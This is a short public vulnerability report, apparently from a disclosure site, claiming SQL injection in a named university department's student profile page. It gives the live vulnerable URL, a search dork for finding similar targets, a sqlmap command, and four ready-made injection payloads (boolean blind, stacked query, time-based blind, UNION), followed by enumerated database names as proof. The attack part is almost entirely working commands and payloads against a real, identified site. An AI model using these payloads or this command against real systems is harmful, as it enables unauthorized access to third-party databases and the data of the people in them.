Washington University College of Engineering SQL Injection Vulnerability

2021.08.11
tr Emyounoone (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: Washington University College of Engineering SQL Injection Vulnerability # Author: Emyounoone # Google Dork: profile.php?id= # Date: 11/08/2021 # Vendor Homepage: https://www.hcde.washington.edu # Tested on: Kali Linux # Vulnerable Path: https://www.hcde.washington.edu/profiles/students/profile.php?id=381 # python3 sqlmap.py https://www.hcde.washington.edu/profiles/students/profile.php?id=381 --dbs --random-agent --- Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=381' AND 8213=8213 AND 'CirB'='CirB Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: id=381';SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=381' AND (SELECT 2712 FROM (SELECT(SLEEP(5)))paND) AND 'DSGS'='DSGS Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: id=-3242' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b706b71,0x496e7157664e61754c467762684d4f6152467a6f4a6d7a774e6c726f6b6264447150435150416e77,0x717a6b7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- #Evidence: available databases [3]: [*] hcde_apps [*] hcde_scheduler [*] information_schema


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top